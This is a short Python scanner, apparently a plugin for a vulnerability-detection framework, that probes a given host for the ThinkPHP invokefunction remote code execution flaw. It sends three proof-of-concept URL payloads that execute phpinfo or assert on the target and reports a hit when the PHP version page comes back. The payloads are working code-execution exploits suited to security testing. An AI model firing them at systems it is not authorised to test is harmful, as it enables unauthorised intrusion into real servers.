#!/usr/bin/env python
# coding=utf-8


import requests
import sys

from json_parse import Jsonparse

reload(sys)
sys.setdefaultencoding( "utf-8" )

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
    "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3",
    "Content-Type": "text/xml"
}

PAYLOAD = [
    "/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo();",
    "/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",
    "/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
]#3个检测POC

class ThinkPHPScanner(object):
    def __init__(self,ip,port,level):
        self.ip = ip
        self.port = port
        self.level = level
    def run(self):
        url = 'http://'+self.ip+':'+str(self.port)
        try:
            for i in PAYLOAD:
                payload= i
                vulnurl= url + payload#漏洞url
                response= requests.get(vulnurl, headers=headers, timeout=self.level, verify=False, allow_redirects=False)
                #soup = BeautifulSoup(response.text, "lxml")#解析响应    
                #print(response.text)
                if 'PHP Version' in str(response.text):
                #检测特征
                    print('[+] vul in target\n[+] Payload=> '+payload+'\n')
                    exit(233)
        except Exception as e:
            print("refuse")
            print(e)
            exit(-1)
        exit(1)
    
if __name__ == '__main__':
    jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
    jsonobj = Jsonparse(jsonfile)
    jsondata = jsonobj.parse()
    targetip = sys.argv[2]
    timeout = jsondata['timeout']
    port = sys.argv[3]
    Scanner =ThinkPHPScanner(targetip, port, timeout)
    Scanner.run()

